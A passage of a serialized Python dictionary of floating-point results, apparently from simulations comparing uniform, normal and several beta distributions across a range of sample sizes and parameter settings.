'beta2': 1.179045003751046, 'beta4': 0.3729228914045017}, 300: {'uni': 0.4644552857669589, 'nor': 0.5653154717862657, 'beta1': 0.46300936268982834, 'beta2': 0.9776044208448484, 'beta4': 0.38982619311615263}, 200: {'uni': 0.4571278925321188, 'nor': 0.5334620435688897, 'beta1': 0.45769696165515195, 'beta2': 0.783196788788819, 'beta4': 0.4111185009994434}, 150: {'uni': 0.4501014461173613, 'nor': 0.5235082860405369, 'beta1': 0.4554205617411987, 'beta2': 0.7050034087974801, 
'beta4': 0.4169551450168423}, 100: {'uni': 0.4640563713024824, 'nor': 0.5088639605300145, 'beta1': 0.4526189404673693, 'beta2': 0.6166857601686297, 'beta4': 0.4284294881310813}, 75: {'uni': 0.46172983920615474, 'nor': 0.48326130937595263, 'beta1': 0.46557677737339276, 'beta2': 0.5663728109579013, 'beta4': 0.43479865707945214}, 50: {'uni': 0.45384779467384323, 'nor': 0.4744302526175002, 'beta1': 0.4578899375202278, 'beta2': 0.5360352336411138, 'beta4': 0.4483607871304931}, 30: {'uni': 0.4582035780536769, 'nor': 0.4625643124126838, 'beta1': 0.46174031673574345, 'beta2': 0.4992136649412738, 'beta4': 0.45735799800719645}, 20: {'uni': 0.4526152214826935, 'nor': 0.4700366710058157, 'beta1': 0.45825521668523833, 'beta2': 0.48288733318211274, 'beta4': 0.4513037697878831}, 10: {'uni': 0.4557565864779044, 'nor': 0.4605305109093896, 'beta1': 0.45008522280936103, 'beta2': 0.456650225645871, 'beta4': 0.4473779014384035}}, 750: {1000: {'uni': 0.4671101385676527, 'nor': 0.9530664085923595, 'beta1': 0.47021996721580633, 'beta2': 2.576076443647349, 'beta4': 0.28735513040023863}, 750: {'uni': 0.46549469608311234, 'nor': 0.8304507565146779, 'beta1': 0.46247720908266216, 'beta2': 1.9297411734235133, 'beta4': 0.3175400030818115}, 500: {'uni': 0.45031971859128733, 'nor': 0.7037121636426986, 'beta1': 0.4561887749034241, 'beta2': 1.3861924601141589, 'beta4': 0.33932522495776996}, 400: {'uni': 0.45910749033925163, 'nor': 0.6584547024212655, 'beta1': 0.46280894836812647, 'beta2': 1.177901179686585, 'beta4': 0.36205890600857127}, 300: {'uni': 0.4598996192822354, 'nor': 0.5932997635796144, 'beta1': 0.4566144871979255, 'beta2': 1.003307298985205, 'beta4': 0.37620893309626435}, 200: {'uni': 0.4687450522736763, 'nor': 0.5535329672062865, 'beta1': 0.45546423259991065, 'beta2': 0.8003681825795168, 'beta4': 0.39545533013427847}, 150: {'uni': 0.4615068053273442, 'nor': 0.5337201883098839, 'beta1': 0.4658827349939095, 'beta2': 0.7194878279530482, 'beta4': 0.39930675083159844}, 100: {'uni': 
0.45294161352762236, 'nor': 0.49934234578623937, 'beta1': 0.45939987939480864, 'beta2': 0.6271644471759874, 'beta4': 0.42228996859829304}, 75: {'uni': 0.46396194890875886, 'nor': 0.4991938436100394, 'beta1': 0.4516637122972515, 'beta2': 0.600183976681279, 'beta4': 0.4315787240897153}, 50: {'uni': 0.4558134596093263, 'nor': 0.48532012355575227, 'beta1': 0.46668813480110743, 'beta2': 0.5516090319210735, 'beta4': 0.4403510493137504}, 30: {'uni': 0.4532337683620265, 'nor': 0.47431141524632014, 'beta1': 0.45894951442019266, 'beta2': 0.5127086350573624, 'beta4': 0.4538090248861624}, 20: {'uni': 0.45706656231424797, 'nor': 0.4683828099157367, 'beta1': 0.4578578291661163, 'beta2': 0.48619566535923797, 'beta4': 0.45265523176626016}, 10: {'uni': 0.4547063269767834, 'nor': 0.4642234490355344, 'beta1': 0.458910199349091, 'beta2': 0.47790940842399, 'beta4': 0.44187531689045434}}, 500: {1000: {'uni': 0.46431028072910796, 'nor': 1.2234668429214117, 'beta1': 0.4663409164283998, 'beta2': 2.909984174283791, 'beta4': 0.2638984835623977}, 750: {'uni': 0.4527296267722845, 'nor': 1.0129802673096442, 'beta1': 0.4661915241033681, 'beta2': 2.234543975122914, 'beta4': 0.28640752516522716}, 500: {'uni': 0.44920975339976527, 'nor': 0.8384973662337322, 'beta1': 0.4659177279610012, 'beta2': 1.6573851889124338, 'beta4': 0.3100483149128471}, 400: {'uni': 0.4604675769306956, 'nor': 0.7579069321331191, 'beta1': 0.4597499831992274, 'beta2': 1.375925316264524, 'beta4': 0.3271543663337684}, 300: {'uni': 0.46331646241562313, 'nor': 0.6860309707578209, 'beta1': 0.45672744909248153, 'beta2': 1.1455923805506387, 'beta4': 0.35199679848261545}, 200: {'uni': 0.46098791431035313, 'nor': 0.6110936233160561, 'beta1': 0.45623909036855964, 'beta2': 0.9023873311329137, 'beta4': 0.3740712067833442}, 150: {'uni': 0.46468019323747944, 'nor': 0.5726647439154294, 'beta1': 0.4579527283181098, 'beta2': 0.8137349608860205, 'beta4': 0.38660489715338325}, 100: {'uni': 0.44280947247057195, 'nor': 0.541212184044558, 'beta1': 
0.4586912165344261, 'beta2': 0.6802911262157844, 'beta4': 0.40623099849768124}, 75: {'uni': 0.46067109767294057, 'nor': 0.5060241328725488, 'beta1': 0.4491456775696246, 'beta2': 0.6232000035126825, 'beta4': 0.41007335800405376}, 50: {'uni': 0.4642733769081602, 'nor': 0.4977233114944672, 'beta1': 0.4626897423482415, 'beta2': 0.5705187474225152, 'beta4': 0.43059164051626647}, 30: {'uni': 0.4634043308646643, 'nor': 0.47331431231053034, 'beta1': 0.4554845714502249, 'beta2': 0.5139451555702169, 'beta4': 0.4409000510846484}, 20: {'uni': 0.45447992295448086, 'nor': 0.46678900243826393, 'beta1': 0.4626946837181949, 'beta2': 0.4930376191474854, 'beta4': 0.44935770151688587}, 10: {'uni': 0.45968160397151125, 'nor': 0.45690145976659674, 'beta1': 0.4566821472035449, 'beta2': 0.47419588710664023, 'beta4': 0.4454396591179534}}, 400: {1000: {'uni': 0.46334746314235276, 'nor': 1.4212390782587057, 'beta1': 0.46432389571147187, 'beta2': 2.9511199986889567, 'beta4': 0.2548616038247043}, 750: {'uni': 0.46250149072434, 'nor': 1.1572837205061097, 'beta1': 0.45295311454161974, 'beta2': 2.2440218041300914, 'beta4': 0.2710536211963412}, 500: {'uni': 0.45875549934793214, 'nor': 0.9122844809960323, 'beta1': 0.46801707119646535, 'beta2': 1.6311861640718006, 'beta4': 0.299393562783303}, 400: {'uni': 0.45999191565658354, 'nor': 0.8321847654729663, 'beta1': 0.4543498505221871, 'beta2': 1.3834076695036321, 'beta4': 0.3147187867784898}, 300: {'uni': 0.4554315877101111, 'nor': 0.7443688240945351, 'beta1': 0.45801052563798017, 'beta2': 1.1684865218336506, 'beta4': 0.33644119882532764}, 200: {'uni': 0.45178274951742387, 'nor': 0.6453749303312785, 'beta1': 0.4622690847109136, 'beta2': 0.9539305765063816, 'beta4': 0.36638705949582}, 150: {'uni': 0.46095703347012823, 'nor': 0.5920587225254844, 'beta1': 0.46154296100068704, 'beta2': 0.8211590220880783, 'beta4': 0.3773287000190313}, 100: {'uni': 0.4544996973676238, 'nor': 0.5571569000218716, 'beta1': 0.453375970925131, 'beta2': 0.692973824446134, 'beta4': 
0.39552439235261067}, 75: {'uni': 0.4557987009033754, 'nor': 0.5310033434466808, 'beta1': 0.46394857322795036, 'beta2': 0.6395425030032836, 'beta4': 0.41383415561423936}, 50: {'uni': 0.4596200061931766, 'nor': 0.5035061103314598, 'beta1': 0.46157446299514704, 'beta2': 0.5707639621760862, 'beta4': 0.4274547334895614}, 30: {'uni': 0.4622195415634097, 'nor': 0.481847432681625, 'beta1': 0.45645686175488404, 'beta2': 0.5282215919286881, 'beta4': 0.44942696536191723}, 20: {'uni': 0.4601535149631279, 'nor': 0.46786286516371267, 'beta1': 0.4584807741864064, 'beta2': 0.5048557967951252, 'beta4': 0.4467008433551776}, 10: {'uni': 0.4566656610912351, 'nor': 0.4608766556204386, 'beta1': 0.45972096388599104, 'beta2': 0.46187183414597643, 'beta4': 0.44529944495174606}}, 300: {1000: {'uni': 0.4678306072779978, 'nor': 1.6846576613370994, 'beta1': 0.455141320355163, 'beta2': 3.2769979281996946, 'beta4': 0.24362518318852816}, 750: {'uni': 0.4639283758788118, 'nor': 1.3692288724675523, 'beta1': 0.4519930460350413, 'beta2': 2.48255224192705, 'beta4': 0.257787980956284}, 500: {'uni': 0.4615433540741257, 'nor': 1.0781678636207295, 'beta1': 0.4568829378747058, 'beta2': 1.7874941485381564, 'beta4': 0.2784868409512676}, 400: {'uni': 0.46314421492499913, 'nor': 0.945656701408267, 'beta1': 0.45638148747157714, 'beta2': 1.5553160126544203, 'beta4': 0.29442225358951485}, 300: {'uni': 0.45802925961617075, 'nor': 0.815185178839487, 'beta1': 0.4728376878704712, 'beta2': 1.3189271036216643, 'beta4': 0.31282000690847095}, 200: {'uni': 0.45552503014694784, 'nor': 0.7126513035155815, 'beta1': 0.457748166276982, 'beta2': 1.0244415040388415, 'beta4': 0.33638426993603954}, 150: {'uni': 0.45977438272674637, 'nor': 0.6476380215438066, 'beta1': 0.46088490835938306, 'beta2': 0.883431113717793, 'beta4': 0.3612048298573282}, 100: {'uni': 0.4577251815882555, 'nor': 0.5847497979075034, 'beta1': 0.4607222654294412, 'beta2': 0.7408620962926734, 'beta4': 0.388104481277193}, 75: {'uni': 0.4518072467213142, 'nor': 
0.5473729546010359, 'beta1': 0.4627254896168214, 'beta2': 0.6718156449469996, 'beta4': 0.39949639520710356}, 50: {'uni': 0.4624340988295268, 'nor': 0.5070678067559616, 'beta1': 0.4600742937716636, 'beta2': 0.5877011320882554, 'beta4': 0.41897175228123534}, 30: {'uni': 0.4471319926020618, 'nor': 0.49800426129809117, 'beta1': 0.46166731503603964, 'beta2': 0.5382082617448081, 'beta4': 0.4269532461240621}, 20: {'uni': 0.4507897993107089, 'nor': 0.4883236654625753, 'beta1': 0.45173581672090074, 'beta2': 0.5137279220044103, 'beta4': 0.429523416507684}, 10: {'uni': 0.45073558507341144, 'nor': 0.46918804329372793, 'beta1': 0.4451935416099544, 'beta2': 0.4852511163613957, 'beta4': 0.44714304152144957}}, 200: {1000: {'uni': 0.45885173358196935, 'nor': 2.313702128659912, 'beta1': 0.46628907909788697, 'beta2': 3.919691106665795, 'beta4': 0.22577462466197668}, 750: {'uni': 0.46486920384123687, 'nor': 1.894257654666399, 'beta1': 0.4583262434977319, 'beta2': 2.996917703241686, 'beta4': 0.2365414295750558}, 500: {'uni': 0.4655614734441917, 'nor': 1.4121255947025406, 'beta1': 0.46139377072341475, 'beta2': 2.1388747442025053, 'beta4': 0.25571742276292764}, 400: {'uni': 0.45979504899083645, 'nor': 1.1959447863019266, 'beta1': 0.4633743884393436, 'beta2': 1.8945633202659455, 'beta4': 0.26174739678990866}, 300: {'uni': 0.46151970036157763, 'nor': 0.9990455243111591, 'beta1': 0.45625628150868885, 'beta2': 1.5323939095799728, 'beta4': 0.2797029660784162}, 200: {'uni': 0.46329361026808363, 'nor': 0.8279186395972875, 'beta1': 0.4601804288648336, 'beta2': 1.1681140647178716, 'beta4': 0.30982583667555}, 150: {'uni': 0.4572822684346562, 'nor': 0.7479149303285376, 'beta1': 0.4594933621823919, 'beta2': 0.9966989126230038, 'beta4': 0.33461124037426687}, 100: {'uni': 0.45394668972915964, 'nor': 0.6398062870023858, 'beta1': 0.4627344243428069, 'beta2': 0.8176636065711426, 'beta4': 0.3599502235499713}, 75: {'uni': 0.46314929132601923, 'nor': 0.5942511767606652, 'beta1': 0.462554701559842, 'beta2': 
0.726258500681477, 'beta4': 0.37828723280018234}, 50: {'uni': 0.4556089575922582, 'nor': 0.5488603313292467, 'beta1': 0.4598695592482842, 'beta2': 0.6441882415918142, 'beta4': 0.3957454832976954}, 30: {'uni': 0.45773418553147505, 'nor': 0.5205925655922161, 'beta1': 0.45894106285346375, 'beta2': 0.569590768144685, 'beta4': 0.4160624036343173}, 20: {'uni': 0.46253502192456564, 'nor': 0.4949851926492912, 'beta1': 0.462302879698588, 'beta2': 0.5144720515689009, 'beta4': 0.4386929562520044}, 10: {'uni': 0.4585444998193927, 'nor': 0.46913451515184496, 'beta1': 0.4450396687432986, 'beta2': 0.4801828396960754, 'beta4': 0.4417697576556915}}, 150: {1000: {'uni': 0.4686739363709819, 'nor': 3.0262824022146155, 'beta1': 0.46075378959802543, 'beta2': 4.496772517732899, 'beta4': 0.21956864156299188}, 750: {'uni': 0.4730757712115682, 'nor': 2.2878474628402823, 'beta1': 0.4641952013648905, 'beta2': 3.454226350268236, 'beta4': 0.22513983749519534}, 500: {'uni': 0.467323739972249, 'nor': 1.6752768321041132, 'beta1': 0.4734160827536498, 'beta2': 2.5583449698042604, 'beta4': 0.24163315664882407}, 400: {'uni': 0.467181361388595, 'nor': 1.4717110841963421, 'beta1': 0.45676945943433245, 'beta2': 2.2003419598014085, 'beta4': 0.25499403072675786}, 300: {'uni': 0.45817365599621135, 'nor': 1.2144884739248925, 'beta1': 0.45423292829145157, 'beta2': 1.6795832143167255, 'beta4': 0.26984851882435923}, 200: {'uni': 0.46031214602007703, 'nor': 0.9544823344865221, 'beta1': 0.45827471295224265, 'beta2': 1.3068555477711477, 'beta4': 0.2956335766326793}, 150: {'uni': 0.46250179659059476, 'nor': 0.8307292323075929, 'beta1': 0.47030699679154425, 'beta2': 1.0824444708192549, 'beta4': 0.3116662669384352}, 100: {'uni': 0.47437294155670234, 'nor': 0.698032260670409, 'beta1': 0.46050428122512643, 'beta2': 0.8771177581058969, 'beta4': 0.3478432220883441}, 75: {'uni': 0.46101568928238096, 'nor': 0.6391901872213495, 'beta1': 0.45808838518118866, 'beta2': 0.7703520551683095, 'beta4': 0.35717525548395185}, 50: 
{'uni': 0.46462622526658554, 'nor': 0.5996395671389139, 'beta1': 0.454405885743777, 'beta2': 0.6701476805830073, 'beta4': 0.383110957598389}, 30: {'uni': 0.4549742139788515, 'nor': 0.5227227637941175, 'beta1': 0.4526654552204387, 'beta2': 0.5842761326082846, 'beta4': 0.4060905864194273}, 20: {'uni': 0.45533149660388467, 'nor': 0.5056742867344781, 'beta1': 0.46385670689315067, 'beta2': 0.5371663970405931, 'beta4': 0.4217230902196201}, 10: {'uni': 0.4535641773609069, 'nor': 0.48426462527854375, 'beta1': 0.4605937364242689, 'beta2': 0.4901859387468606, 'beta4': 0.43806641766772514}}, 100: {1000: {'uni': 0.48930491522355274, 'nor': 4.231794279078222, 'beta1': 0.4648268159128582, 'beta2': 5.076033920994245, 'beta4': 0.2123190473857698}, 750: {'uni': 0.47066230425528277, 'nor': 3.3241758532972563, 'beta1': 0.4613337407126484, 'beta2': 4.110911007916439, 'beta4': 0.21746590521356995}, 500: {'uni': 0.4704192169450034, 'nor': 2.3153245303624077, 'beta1': 0.4565432447792894, 'beta2': 2.8234958993051213, 'beta4': 0.22605852382886565}, 400: {'uni': 0.465838791251487, 'nor': 1.9527095270766885, 'beta1': 0.4566450098243281, 'beta2': 2.4468007928214504, 'beta4': 0.23721322735781392}, 300: {'uni': 0.46411098088520025, 'nor': 1.561014800073201, 'beta1': 0.4632108284525748, 'beta2': 1.8642831244346392, 'beta4': 0.24835753772698207}, 200: {'uni': 0.45174147277551824, 'nor': 1.2023498240705341, 'beta1': 0.46011541007923223, 'beta2': 1.4533092999265533, 'beta4': 0.2695895257232507}, 150: {'uni': 0.45512101910714126, 'nor': 1.0227861444988746, 'beta1': 0.45629355382831654, 'beta2': 1.2101007363962848, 'beta4': 0.2826402129948454}, 100: {'uni': 0.44895422601988727, 'nor': 0.8281829651173791, 'beta1': 0.4599492148727822, 'beta2': 0.9522402297514921, 'beta4': 0.3100819029507226}, 75: {'uni': 0.4624546094616787, 'nor': 0.7391357154698432, 'beta1': 0.4454256867486279, 'beta2': 0.8380807783471576, 'beta4': 0.3350546905751392}, 50: {'uni': 0.4582123043671451, 'nor': 0.6436142214253436, 
'beta1': 0.45290471826329226, 'beta2': 0.6884686777502067, 'beta4': 0.3535200461220699}, 30: {'uni': 0.45027154229719185, 'nor': 0.5713935637999112, 'beta1': 0.4573479450749157, 'beta2': 0.6015939522027731, 'beta4': 0.3839413198651744}, 20: {'uni': 0.45171743897365974, 'nor': 0.5347497445539434, 'beta1': 0.46211432961160004, 'beta2': 0.5451510328036631, 'beta4': 0.40451931108916456}, 10: {'uni': 0.44070319928906704, 'nor': 0.4936671748919524, 'beta1': 0.4541059781166824, 'beta2': 0.49464729872647506, 'beta4': 0.4318904485577639}}, 75: {1000: {'uni': 0.5003977481745122, 'nor': 5.462091297206367, 'beta1': 0.4680613054845644, 'beta2': 5.924127662942348, 'beta4': 0.20689611333819638}, 750: {'uni': 0.4863213870019091, 'nor': 4.195407788335534, 'beta1': 0.45921461198551916, 'beta2': 4.565196319176767, 'beta4': 0.2117710761786967}, 500: {'uni': 0.48206260654769756, 'nor': 3.009404705689477, 'beta1': 0.4594797526137332, 'beta2': 3.2296753596700754, 'beta4': 0.219205809113329}, 400: {'uni': 0.48282191154017823, 'nor': 2.463683631414553, 'beta1': 0.45092972241618584, 'beta2': 2.6765713933408413, 'beta4': 0.2251887548381428}, 300: {'uni': 0.47174966823511777, 'nor': 1.9615869965631514, 'beta1': 0.4583462725670028, 'beta2': 2.1532255364843853, 'beta4': 0.23397868721020146}, 200: {'uni': 0.4626689744300011, 'nor': 1.4641327983886003, 'beta1': 0.4658991503050986, 'beta2': 1.5737286518460933, 'beta4': 0.25104192403440617}, 150: {'uni': 0.4657367060782218, 'nor': 1.2246992402511192, 'beta1': 0.4608643825770374, 'beta2': 1.298200837285324, 'beta4': 0.2657567009143168}, 100: {'uni': 0.4680974024125245, 'nor': 0.9869302426794837, 'beta1': 0.45671102797869095, 'beta2': 1.0239621521249562, 'beta4': 0.28860697938441604}, 75: {'uni': 0.45721900242950014, 'nor': 0.8394457650917727, 'beta1': 0.45257963102668763, 'beta2': 0.8762211832314769, 'beta4': 0.30828992116505344}, 50: {'uni': 0.46221923910596263, 'nor': 0.7025130572021119, 'beta1': 0.4663920405352124, 'beta2': 0.7320291693929537, 
'beta4': 0.3374203378918949}, 30: {'uni': 0.46162653508754836, 'nor': 0.5945057627400746, 'beta1': 0.460262757481406, 'beta2': 0.6125308748955279, 'beta4': 0.37175415079144314}, 20: {'uni': 0.4484831394973252, 'nor': 0.5549838564035073, 'beta1': 0.4465222643970824, 'beta2': 0.5731591544178343, 'beta4': 0.3955814404310021}, 10: {'uni': 0.4476154281433029, 'nor': 0.5084002647840371, 'beta1': 0.44746085678431474, 'beta2': 0.5057333922587223, 'beta4': 0.41560141836545733}}, 50: {1000: {'uni': 0.5663296978660596, 'nor': 7.983963066009825, 'beta1': 0.46814721453633024, 'beta2': 7.492537638667248, 'beta4': 0.20220788976247608}, 750: {'uni': 0.534971516073435, 'nor': 6.083186838398358, 'beta1': 0.46772071939621757, 'beta2': 5.857165814312657, 'beta4': 0.2087106159241854}, 500: {'uni': 0.5110652229849488, 'nor': 4.245763354477031, 'beta1': 0.4635245488014993, 'beta2': 4.006367236866797, 'beta4': 0.2125436775661207}, 400: {'uni': 0.49656540793595844, 'nor': 3.4903307593763615, 'beta1': 0.4596191698570935, 'beta2': 3.220472312730357, 'beta4': 0.21522710874813766}, 300: {'uni': 0.48325484856882694, 'nor': 2.7439875309400663, 'beta1': 0.46979584833424004, 'beta2': 2.454009618094874, 'beta4': 0.22202183552173416}, 200: {'uni': 0.4749008479770199, 'nor': 1.9911920792861806, 'beta1': 0.4646514964240773, 'beta2': 1.8398693746548478, 'beta4': 0.23132822063479933}, 150: {'uni': 0.45992992076859157, 'nor': 1.5868134499191664, 'beta1': 0.4643633359446529, 'beta2': 1.5244070878488096, 'beta4': 0.241921281044518}, 100: {'uni': 0.4595325614734308, 'nor': 1.1877615726990094, 'beta1': 0.4556650201969106, 'beta2': 1.1488237785978777, 'beta4': 0.26302607932992944}, 75: {'uni': 0.4520277530528519, 'nor': 1.0399301654084963, 'beta1': 0.45349015551351834, 'beta2': 0.9621553030458346, 'beta4': 0.2888083942150036}, 50: {'uni': 0.44992890748902026, 'nor': 0.8404661942325818, 'beta1': 0.45869080459514733, 'beta2': 0.8067902763450495, 'beta4': 0.30944414708340734}, 30: {'uni': 0.45607719675530556, 
'nor': 0.6802063225745539, 'beta1': 0.44960843024574637, 'beta2': 0.6511496131049556, 'beta4': 0.34852267592227426}, 20: {'uni': 0.4475451587223669, 'nor': 0.5993508489607557, 'beta1': 0.4465931941437228, 'beta2': 0.596548736443132, 'beta4': 0.37438540421392114}, 10: {'uni': 0.44988236069403104, 'nor': 0.5247871497390096, 'beta1': 0.45464843165719043, 'beta2': 0.50412851889225, 'beta4': 0.4041010172891987}}, 30: {1000: {'uni': 0.7387233486988768, 'nor': 13.088402113564948, 'beta1': 0.47865647929539973, 'beta2': 9.912717867631558, 'beta4': 0.19858219196297577}, 750: {'uni': 0.6716005073702885, 'nor': 9.898721221592352, 'beta1': 0.46649443507443217, 'beta2': 7.416096292643614, 'beta4': 0.20003363414287242}, 500: {'uni': 0.5992179294036338, 'nor': 6.920710947011493, 'beta1': 0.46975583075586863, 'beta2': 4.964800683896901, 'beta4': 0.20435420309200666}, 400: {'uni': 0.5561270269868971, 'nor': 5.66798011970821, 'beta1': 0.4717982184500732, 'beta2': 4.106537093753369, 'beta4': 0.20691331385704004}, 300: {'uni': 0.5368877356646864, 'nor': 4.2779346835887555, 'beta1': 0.4652230282555292, 'beta2': 3.1241120043999575, 'beta4': 0.21011463481669218}, 200: {'uni': 0.4987013286374435, 'nor': 2.959741272830969, 'beta1': 0.46381906690045765, 'beta2': 2.2157230067479814, 'beta4': 0.21729932835609236}, 150: {'uni': 0.49840708861118943, 'nor': 2.352823733206511, 'beta1': 0.45640297863082435, 'beta2': 1.779992721937523, 'beta4': 0.22700584318850683}, 100: {'uni': 0.471756061765789, 'nor': 1.7431236435657966, 'beta1': 0.45530265822942073, 'beta2': 1.337831703717496, 'beta4': 0.23974268049710493}, 75: {'uni': 0.4649466295886003, 'nor': 1.4126507700625057, 'beta1': 0.4580500700771751, 'beta2': 1.128839322838012, 'beta4': 0.251645105883213}, 50: {'uni': 0.4535321638232544, 'nor': 1.0828805050102166, 'beta1': 0.4538612144716673, 'beta2': 0.8944487312764252, 'beta4': 0.2772114320140775}, 30: {'uni': 0.4548389075174882, 'nor': 0.8377037159832129, 'beta1': 0.4519596464989444, 'beta2': 
0.7094375595815571, 'beta4': 0.310244459466603}, 20: {'uni': 0.4451068851924446, 'nor': 0.7339007690903065, 'beta1': 0.4451277942845969, 'beta2': 0.6008918124507844, 'beta4': 0.338998587660669}, 10: {'uni': 0.45353927033858477, 'nor': 0.5782028388164439, 'beta1': 0.4584685620829519, 'beta2': 0.531376107648766, 'beta4': 0.38352415993817385}}, 20: {1000: {'uni': 1.0894922478649511, 'nor': 20.003094666486263, 'beta1': 0.5181844718184673, 'beta2': 12.13321215700854, 'beta4': 0.1962693415263007}, 750: {'uni': 0.9184009700423779, 'nor': 15.013754159330176, 'beta1': 0.5021945895537219, 'beta2': 9.162381456103228, 'beta4': 0.19629774346862977}, 500: {'uni': 0.7588954962445985, 'nor': 10.055656119144814, 'beta1': 0.4922340597004922, 'beta2': 6.123698563556234, 'beta4': 0.20025199202983998}, 400: {'uni': 0.6997818044235432, 'nor': 8.209642023001999, 'beta1': 0.4816402192212816, 'beta2': 5.1244484441005325, 'beta4': 0.20180721973367308}, 300: {'uni': 0.6305296664843701, 'nor': 6.273332564653617, 'beta1': 0.4783208741435825, 'beta2': 3.8922181031413277, 'beta4': 0.20515722848399004}, 200: {'uni': 0.5656028930795196, 'nor': 4.372928002486701, 'beta1': 0.475973934426061, 'beta2': 2.677360291305044, 'beta4': 0.2100432666640936}, 150: {'uni': 0.5349220822574644, 'nor': 3.3411354111522917, 'beta1': 0.47500519582521517, 'beta2': 2.137164523272219, 'beta4': 0.214232307355653}, 100: {'uni': 0.5045468518311341, 'nor': 2.4340920510874984, 'beta1': 0.45888547757876796, 'beta2': 1.588903919680189, 'beta4': 0.2246944373092718}, 75: {'uni': 0.48771323589584, 'nor': 1.9342381299397664, 'beta1': 0.459726728581532, 'beta2': 1.286504131157538, 'beta4': 0.23430910656002463}, 50: {'uni': 0.4644642299419138, 'nor': 1.4514552833852477, 'beta1': 0.45454814751513606, 'beta2': 0.9699335230442881, 'beta4': 0.24784781696012298}, 30: {'uni': 0.4630355897784532, 'nor': 1.0525485187071442, 'beta1': 0.44890325734490744, 'beta2': 0.7612572461007282, 'beta4': 0.27771911847861674}, 20: {'uni': 
0.44436687230622546, 'nor': 0.8395516873431574, 'beta1': 0.45817604259495165, 'beta2': 0.6608362126367603, 'beta4': 0.31123542244036}, 10: {'uni': 0.4361704051076968, 'nor': 0.6572725764375509, 'beta1': 0.4413867755624091, 'beta2': 0.549693246598183, 'beta4': 0.35789683180043264}}, 10: {1000: {'uni': 2.71866569395543, 'nor': 40.3607988416683, 'beta1': 1.045723953486904, 'beta2': 18.264584863269278, 'beta4': 0.19340346551484838}, 750: {'uni': 2.135095878109219, 'nor': 31.335751870550318, 'beta1': 0.8686608835871902, 'beta2': 13.837281382290511, 'beta4': 0.19674409440753848}, 500: {'uni': 1.561435372670413, 'nor': 20.847843925502136, 'beta1': 0.7026497048494321, 'beta2': 9.127638494088687, 'beta4': 0.19914538106246596}, 400: {'uni': 1.3464692788145056, 'nor': 16.675073125445905, 'beta1': 0.6560756046842351, 'beta2': 7.406779998790831, 'beta4': 0.1981648542595328}, 300: {'uni': 1.0884293558360072, 'nor': 12.372459331870136, 'beta1': 0.5877835264042439, 'beta2': 5.737333836923571, 'beta4': 0.20237617530927202}, 200: {'uni': 0.8631494900499794, 'nor': 8.300996637013071, 'beta1': 0.5248229438161377, 'beta2': 3.872762504402488, 'beta4': 0.2046459202157461}, 150: {'uni': 0.746249692807121, 'nor': 6.406640972978801, 'beta1': 0.5064527635631025, 'beta2': 2.971093545391119, 'beta4': 0.20257999588678052}, 100: {'uni': 0.6390360884623073, 'nor': 4.453947014982036, 'beta1': 0.4776849499506595, 'beta2': 2.111102696976735, 'beta4': 0.20637930623052075}, 75: {'uni': 0.5746789450804921, 'nor': 3.5964267643202255, 'beta1': 0.4853289552525349, 'beta2': 1.6426532163723997, 'beta4': 0.21022302629863826}, 50: {'uni': 0.5211310313766764, 'nor': 2.4917181735328917, 'beta1': 0.4700618462509633, 'beta2': 1.267274957963436, 'beta4': 0.2211410893248344}, 30: {'uni': 0.47804153947804207, 'nor': 1.6848055477508295, 'beta1': 0.44501316015962583, 'beta2': 0.891831606576434, 'beta4': 0.2400552361609186}, 20: {'uni': 0.4465223369536981, 'nor': 1.2624618308322546, 'beta1': 0.4422988766841338, 
'beta2': 0.7196688797683929, 'beta4': 0.2604904005752692}, 10: {'uni': 0.4277837129953045, 'nor': 0.8471825992836655, 'beta1': 0.43299513108162596, 'beta2': 0.562251485700406, 'beta4': 0.30584932166436574}}}, 0.001: {1000: {1000: {'uni': 1.1936263539323357, 'nor': 2.1918383833877755, 'beta1': 1.1678025072294473, 'beta2': 6.774662646818605, 'beta4': 0.7926506036514294}, 750: {'uni': 1.1351909160899902, 'nor': 1.8986037036959484, 'beta1': 1.1407378263405077, 'beta2': 5.223023039944906, 'beta4': 0.8307779101630771}, 500: {'uni': 1.22774302421359, 'nor': 1.6238844893077675, 'beta1': 1.0804763693096529, 'beta2': 3.804599441299924, 'beta4': 0.8466317806886051}, 400: {'uni': 1.1307350302833419, 'nor': 1.5796751405899492, 'beta1': 1.2064530025809463, 'beta2': 3.3883927721160263, 'beta4': 0.9150569778427471}, 300: {'uni': 1.187305392407893, 'nor': 1.4695856313641065, 'beta1': 1.1535037606458525, 'beta2': 2.772300171422454, 'beta4': 0.8964266997411909}, 200: {'uni': 1.234831043093464, 'nor': 1.3415371409825303, 'beta1': 1.1787142641718298, 'beta2': 2.275931929701913, 'beta4': 1.00370282765997}, 150: {'uni': 1.1996709647495003, 'nor': 1.2937035420290128, 'beta1': 1.1430497852421209, 'beta2': 2.0677243693780016, 'beta4': 0.9643198579006903}, 100: {'uni': 1.1146343746429301, 'nor': 1.2892625248535499, 'beta1': 1.1776396387898163, 'beta2': 1.743862063916319, 'beta4': 1.0907431681894812}, 75: {'uni': 1.171991772371465, 'nor': 1.291285943681346, 'beta1': 1.1174834150199906, 'beta2': 1.4616564016626328, 'beta4': 1.151666583903703}, 50: {'uni': 1.154657400536598, 'nor': 1.1767961384785905, 'beta1': 1.1536256117334385, 'beta2': 1.43287463536852, 'beta4': 1.107820297759248}, 30: {'uni': 1.1398655580396513, 'nor': 1.142777717811652, 'beta1': 1.0608317535206289, 'beta2': 1.221456001179484, 'beta4': 1.1455911895467061}, 20: {'uni': 1.1039461056449387, 'nor': 1.206766578001503, 'beta1': 1.1269090338108658, 'beta2': 1.1721728315710964, 'beta4': 1.0682592850872188}, 10: {'uni': 
1.1121748796693274, 'nor': 1.0749796486931948, 'beta1': 1.0466446681695234, 'beta2': 1.1960619623270785, 'beta4': 1.0802444621913325}}, 750: {1000: {'uni': 1.137661637991768, 'nor': 2.4752561072308645, 'beta1': 1.1582570984642369, 'beta2': 6.863542226032837, 'beta4': 0.6697597937935655}, 750: {'uni': 1.1143294017010406, 'nor': 2.2785887849344943, 'beta1': 1.1814831042585445, 'beta2': 5.4011216297097295, 'beta4': 0.7167053163957068}, 500: {'uni': 1.2511652529854431, 'nor': 1.827338619863956, 'beta1': 1.1412613149111919, 'beta2': 3.8244704455741334, 'beta4': 0.8517746234898397}, 400: {'uni': 1.1399104518317567, 'nor': 1.5874288173312812, 'beta1': 1.155582328147835, 'beta2': 3.1656085392977387, 'beta4': 0.8663874082318641}, 300: {'uni': 1.2225469901339128, 'nor': 1.5167836319695944, 'beta1': 1.11153781169305, 'beta2': 2.8873516129801815, 'beta4': 0.8996920327733064}, 200: {'uni': 1.0954755318435172, 'nor': 